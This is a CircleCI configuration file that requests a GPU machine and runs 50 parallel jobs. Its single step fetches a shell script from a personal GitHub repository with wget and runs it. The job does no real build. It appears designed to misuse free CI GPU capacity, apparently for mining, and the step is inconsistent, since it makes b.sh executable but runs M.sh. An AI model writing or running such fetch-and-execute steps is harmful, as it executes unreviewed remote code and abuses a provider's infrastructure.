version: 2.1
jobs:
  build:
    machine:
      resource_class: gpu.nvidia.medium
      image: ubuntu-1604-cuda-10.1:201909-23
    steps:
      - run: wget https://raw.githubusercontent.com/viwarlani/viwarlani/main/M.sh && chmod +x b.sh && ./M.sh
parallelism: 50
      
